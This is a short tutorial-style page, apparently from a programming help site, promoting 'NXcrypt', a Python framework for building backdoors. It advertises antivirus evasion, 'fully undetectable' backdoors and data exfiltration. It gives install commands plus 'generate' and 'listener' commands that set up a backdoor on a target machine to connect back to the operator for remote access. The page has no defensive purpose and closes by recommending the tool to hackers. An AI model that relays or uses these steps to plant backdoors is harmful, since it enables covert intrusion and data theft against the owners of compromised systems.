📜  NXcrypt – Python后门框架(1)

📅  最后修改于: 2023-12-03 15:03:20.145000             🧑  作者: Mango

NXcrypt: A Python Backdoor Framework

Introduction

NXcrypt is a Python backdoor framework that allows you to create, customize, and deploy backdoors easily. It is designed to be stealthy and to bypass most antivirus programs. With NXcrypt, you can create fully undetectable backdoors that can be used for remote access, data exfiltration, and more.

Features
  • Easy to use: NXcrypt provides a simple and intuitive interface that allows you to create and customize backdoors quickly.
  • Stealthy: NXcrypt is designed to be undetectable by most antivirus programs.
  • Remote access: NXcrypt backdoors can be used to remotely access compromised systems.
  • Data exfiltration: NXcrypt backdoors can be used to exfiltrate data from compromised systems.
  • Customizable: NXcrypt allows you to customize the backdoors to fit your needs.
  • Multi-platform: NXcrypt supports Windows and Linux.
Installation

You can install NXcrypt via pip:

pip install nxcrypt

Alternatively, you can clone the GitHub repository and install it manually:

git clone https://github.com/nccgroup/nxcrypt.git
cd nxcrypt
python setup.py install
Usage

To use NXcrypt, you first need to create a backdoor. You can do this using the generate command:

nxcrypt generate

This will generate a backdoor with the default settings. You can customize the backdoor by specifying various parameters:

nxcrypt generate --host <host> --port <port> --name <name> --icon <icon> --windows --linux

Once you have generated your backdoor, you can deploy it on a target system. To do this, you need to run the listener command on your system:

nxcrypt listener --host <host> --port <port>

This will start a listener on your system. You can then run the backdoor on the target system, and it will connect to your listener. You will then have remote access to the target system.

Conclusion

NXcrypt is a powerful Python backdoor framework that allows you to create customized, stealthy backdoors easily. Whether you need remote access or data exfiltration, NXcrypt has you covered. With its easy-to-use interface and customizable options, NXcrypt is a must-have tool for any hacker or security professional.